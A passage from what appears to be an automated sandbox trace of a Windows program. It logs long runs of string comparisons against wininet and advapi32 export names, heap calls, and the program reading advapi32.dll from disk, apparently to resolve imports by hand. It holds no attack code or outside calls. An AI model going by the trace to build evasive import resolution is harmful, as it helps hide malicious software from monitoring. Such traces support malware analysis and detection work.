lpString2="AppCacheFreeSpace") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.204] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0108.205] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0108.205] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0108.206] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0108.206] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0108.206] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0108.206] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0108.206] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0108.206] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0108.206] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0108.428] GetProcessHeap () returned 0x480000 [0108.428] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4079040 | out: hHeap=0x480000) returned 1 [0108.443] GetProcessHeap () returned 0x480000 [0108.443] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4992e0 [0108.446] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0108.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0108.446] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0108.446] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0108.446] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0108.447] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0108.447] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0108.447] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0108.447] GetProcessHeap () returned 0x480000 [0108.447] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa3ef0) returned 0x2cb2010 [0108.449] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0108.449] ReadFile (in: hFile=0x140, lpBuffer=0x2cb2010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb2010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0108.459] CloseHandle (hObject=0x140) returned 1 [0108.460] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0108.460] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0108.460] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0108.460] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0108.460] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0108.460] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0108.668] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0108.668] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0108.668] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0108.668] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0108.668] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0108.668] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0108.669] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0108.669] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0108.670] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0108.671] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.672] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0108.673] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.673] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0108.674] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0108.674] lstrcmpA 